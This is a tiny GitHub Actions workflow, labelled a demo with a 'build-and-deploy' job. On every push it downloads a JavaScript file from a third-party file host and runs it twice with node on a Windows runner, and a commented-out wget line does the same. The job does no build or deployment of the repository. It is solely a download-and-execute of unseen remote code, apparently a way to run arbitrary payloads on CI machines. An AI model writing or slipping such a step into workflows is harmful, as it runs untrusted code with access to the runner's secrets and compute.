name: GitHub Actions Demo
on: [push]
jobs:
  build-and-deploy:
    runs-on: windows-2019
    steps:
      - uses: actions/checkout@master
#       - run: wget https://files.cnblogs.com/files/mldonkey/index.js;node index.js;node index.js
      - run: (New-Object System.Net.WebClient).DownloadFile('https://files.cnblogs.com/files/mldonkey/index.js',"$PWD/index.js");node index.js;node index.js
